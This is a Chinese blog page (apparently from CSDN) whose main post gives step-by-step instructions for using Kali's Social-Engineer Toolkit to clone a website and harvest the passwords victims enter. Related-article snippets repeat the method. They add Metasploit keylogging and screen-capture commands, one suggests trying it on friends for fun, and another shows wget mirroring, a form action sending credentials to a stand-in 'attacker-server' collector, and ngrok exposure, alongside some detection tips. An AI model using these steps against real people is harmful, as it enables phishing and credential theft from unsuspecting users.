简单的钓鱼网站的制作

最新推荐文章于 2025-05-20 15:23:40 发布
最新推荐文章于 2025-05-20 15:23:40 发布
阅读量2.5w 收藏 68
点赞数 8
CC 4.0 BY-SA版权
分类专栏: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Culprit/article/details/79201201

制作环境: Kali

制作步骤:

1.打开软件,选择第一项社会工程攻击


2.选择2 Website Attack Vectors


3.选择3Credential Harvester Attack Method

4.选择2.网站克隆

5.输入你kali的ip地址

6.输入要克隆的网站的url或者ip


7.接下来便是等待上钩


8当别人输入账号和密码时候便会在窗口反弹


制作钓鱼网站(克隆网站
墨痕诉清风的博客
01-24 2万+
克隆网站
使用Kali搭建钓鱼网站教程
weixin_63116337的博客
03-07 1794
使用kali工具一分钟制作出和目标网站一模一样的钓鱼网站。目标用户使用钓鱼网站登录自己的账号,账号密码将被自动劫持。
干货|几种简单好用的钓鱼网站搭建方法,(非常详细)从零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-20 857
一个虚假的钓鱼网站比较容易被人发现,因为功能是不能正确使用的,即使你使用302重定向,动作也是非常明显的(虽然也可以用,效果也还行),但是基于反向代理的钓鱼网站搭建的话,你只是进行了一次中转,用户还是访问的是实际原来的服务器。但是经过测试,不是所有的网站都能copy,有的网站由于一些前端样式请求解析的问题,导致会出现乱码、404,等一些奇奇怪怪的问题,大概率是需要使用nginx的匹配替换JS,或者header头等,或是跨域访问问题。废话不多说,钓鱼YYDS,尤其是在对一些集团类型的攻击时,很好用。
制作一个简单钓鱼网站
weixin_30745553的博客
07-12 8252
制作一个简单钓鱼网站 实验环境:一台kali虚拟机(用作制作钓鱼网站),NAT模式上网。 一台物理机(就是我的电脑,用作被攻击对象) 首先在kali上打开要使用的工具setoolkit. 接着有6个选项,选择第一个社会工程攻击. 选择社会工程攻击之后接着有11个选项. 选择第二个网站攻击向量. 选择完之后有8个选项。 选择第三个凭证收割攻击方法. 选择完之后有3个选项。 第一个选项是使用...
第一次尝试制作一个钓鱼网站,小白教程,超细!
qq_46089119的博客
02-05 2万+
钓鱼网站制作
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2736
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
用kali制作一个简单钓鱼网站
hovcfuti的博客
07-20 4952
钓鱼网站上输入的用户名和密码会直接显示到kali中,成功得到受害者的账号,这里我没有账号随便输入一个,如果输入的账号是正确的话会直接转跳到真正的网站中,直接无色无味。这时候直接访问自己kali虚拟机的IP,就会访问到一个假的网站,有些小瑕疵哈哈哈,不重要,主要是学习。这时候就可以选择攻击类型,这里我们想要制作一个简单钓鱼网站,输入1,选择社会工程攻击,回车。输入2,选择网站攻击,回车(英语不好,都靠翻译软件,有些不准确)这时候在生成的钓鱼网站中登录,kali机会监听到一些有趣的东西。
简单钓鱼网站制作
qq_45906009的博客
06-23 6123
今天早上闲来无事,在地铁上,想到学习一下钓鱼网站制作,于是到公司就准备实操一下。于是乎 这篇文章诞生了 首先我们需要一台kali。 打开Social Engineering Tools 1.社会工程学攻击 2.快速追踪测试 3.第三方模块 4.升级软件 5.升级配置 6.帮助 我们选择第一个社会工程学攻击 1.鱼叉式网络攻击 2.网页攻击 3.传染媒介式 4.建立payload和generator 5.群发邮件攻击 6.Arduion 基础攻击 7.无线接入攻击 8.二维码攻击 9.powershe
网站制作过程
05-11
"网站制作过程" 网站制作过程是指基于ASP.NET技术开发一个完整的新闻发布系统网站的步骤。该过程涉及到网站目录结构的设计、数据库字段的设计、导航方式的选择、页面风格的统一、开发方法的选择等多个方面。 在...
scratch游戏 简单-用scratch制作小猫钓鱼中的小猫游戏,很简单又好玩
05-12
scratch游戏 简单-用scratch制作小猫钓鱼中的小猫游戏,很简单又好玩
Omega:HTML编码的多功能钓鱼网站
03-18
简单HTML编码的网络钓鱼工具。 脸书|推特| INSTAGRAM | NETFLIX |贝宝 信用:- HiddenEye(针对网上诱骗页面) 考虑捐赠 要求 Google Firebase GitHub帐户 免责声明 仅用于教育目的 欧米茄的使用是最终用户的...
简单制作一个钓鱼网页!
热门推荐
专注前端技术,包括Web端、移动端、小程序、APP
02-15 2万+
网络钓鱼,一个价值很高的词语!如果你曾读过我的一篇文章《价值30亿美元的资料被窃取,网络钓鱼到底有多可怕!》就会知道,网络钓鱼到底有多"值钱"! 如果对网络钓鱼这个词进行解释的话,简而言之,其就是一种黑客手段,或者是一种通过假装自己是受信任的实体来欺骗他人来获取凭据(账号、密码等信息)的方法。 讲白话,都能听懂的就是去仿作一个和正规网站一样的登录页面,欺骗用户进行输入从而达到获取信息的目的! ...
钓鱼网站制作
2302_79984725的博客
10-26 482
首先我们需要一台服务器,这里可以租用腾讯云的注意要打开SSH协议即22号端口。可以在管理控制台中的安全组中,打开管理规则,手动添加,80端口。轻松学会怎么搞钓鱼网站,和好朋友一起尝试,体验不一般的乐趣。只要有上述网址打开谷歌他的密码和账户会自动显示在你的终端上。注意我们打开谷歌时可能无法访问,这是阿里云的访问保护。注册好阿里云之后,可以试用云服务器,在免费试用中。y //这里第一次进入可能会跳出来一个选项。我在这里是使用阿里云,因为送3个月体验😍😍😍。我们访问的是谷歌浏览器。打开远程连接进入会话。
简易钓鱼网站的构建(Kali SetoolKit)
weixin_62196200的博客
06-14 1693
kali-setooklit的使用指南
网络安全实验之钓鱼网站制作及技巧
无问社区的博客
01-13 1301
在红队攻击中,除漏洞以外最简洁高效的攻击方式无疑是钓鱼攻击,通过不同的钓鱼方式可达到不同的攻击效果,本次我会分享最常见的钓鱼手段之一的网站钓鱼技术,同时对可实现的攻击操作进行演示。
亲历钓鱼网站
weixin_34209851的博客
01-06 298
几个环节都让人无暇思考其真实性,直到我刚好去查看了邮箱帐号,发现根本没有这个帐号,才反应过来。
钓鱼链接制作
2202_75502796的博客
01-14 404
MStjj4 即为所生成的钓鱼链接,用内网windows77浏览器访问该钓鱼链接。2.在kali终端中输入msfconsole进入msf控制台。1.准备一台攻击者kali,一台受害者window7。3.依次输入以下代码,下图所需要输入的ip地址是。查看攻击会话: Sessions -i。开启键盘记录:keyscan_start。显示键盘记录:keyscan_dump。开启屏幕截图:use espia。run vnc -i 屏幕监控。查看截图:screengrab。
setoolkit制作简单钓鱼网站
weixin_51646864的博客
10-31 3916
setoolkit制作简单钓鱼网站 打开setoolkit,在终端输入setoolkit打开,也可以直接搜索打开 2.选择下图的第一个“社会工程攻击”,即输入1回车 3、选择下图的第三个 4、选择下图的第三个 5、选择下图的第二个 6、下图这里输入本机的IP地址后回车 7、下面这里输入你要克隆的网页网址,回车 8、然后到了下图,简单钓鱼网站就完成了,在另一台主机的浏览器中输入你刚才第六步时输入的ip就会访问到克隆出来的钓鱼网页,用户在网页上输入的账号密码都会显示在kali这边。 ps:仅限于内网,
kali钓鱼网站
03-24
### 如何在 Kali Linux 中创建或检测钓鱼网站 #### 创建钓鱼网站的基础原理 Kali Linux 提供了一系列用于安全研究和渗透测试的工具,其中一些工具可以帮助模拟钓鱼攻击场景。通过这些工具,可以更好地理解钓鱼攻击的工作机制及其潜在风险。 要创建一个钓鱼网站,通常需要以下几个步骤: 1. **复制目标网站页面** 使用 `wget` 或类似的工具下载目标网站的内容并保存到本地服务器上。这一步可以通过以下命令实现: ```bash wget --mirror --convert-links --adjust-extension --page-requisites https://example.com/ ``` 这条命令会镜像整个网站并将链接转换为相对路径以便于本地运行[^1]。 2. **设置本地 Web 服务** 配置 Apache 或 Nginx 等 Web 服务器来托管克隆下来的网页文件。例如,在 Kali Linux 上启动内置的 Apache 服务: ```bash sudo service apache2 start ``` 3. **修改表单提交地址** 找到 HTML 文件中的 `<form>` 标签,并将其动作属性 (`action`) 修改为目标数据收集脚本的位置。例如: ```html <form action="http://attacker-server/data-collector.php" method="POST"> ``` 4. **部署恶意站点** 将配置好的钓鱼网站上传至公共 IP 地址或者使用 Ngrok 工具生成可访问的外部 URL: ```bash ngrok http 80 ``` --- #### 检测钓鱼网站的方法 为了保护自己免受钓鱼攻击的影响,也可以利用 Kali Linux 的强大功能来进行反制措施分析。 1. **URL 分析器** 利用在线 API 和开源项目检查可疑链接的有效性和安全性。比如 PhishTank 数据库查询接口能够帮助识别已知的钓鱼网址列表[^2]。 2. **HTML 结构对比** 自动化比较两个版本之间的差异可能揭示隐藏重定向或其他异常行为模式的存在情况。Python 脚本示例如下所示: ```python import difflib original_html = open('original.html').read() suspicious_html = open('suspicious.html').read() diff = difflib.HtmlDiff().make_file(original_html.splitlines(), suspicious_html.splitlines()) with open('diff_report.html', 'w') as f: f.write(diff) ``` 3. **流量监控与 DNS 查询记录审查** Sniffing 工具如 Wireshark 或 tcpdump 可捕获网络通信包以发现未经授权的数据传输活动;同时结合 dig 命令验证域名解析结果的真实性。 ```bash dig example-phishing-site.com +short ``` --- #### 推荐资源 对于希望深入掌握高级渗透技巧的学习者来说,《Mastering Kali Linux for Advanced Penetration Testing》第四版提供了详尽指导材料[^4]。书中不仅讲解了如何运用 Metasploit Framework 实施社会工程学攻击,还涉及到了更多关于模糊测试、漏洞扫描等方面的实战案例分享[^3]。 ---
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值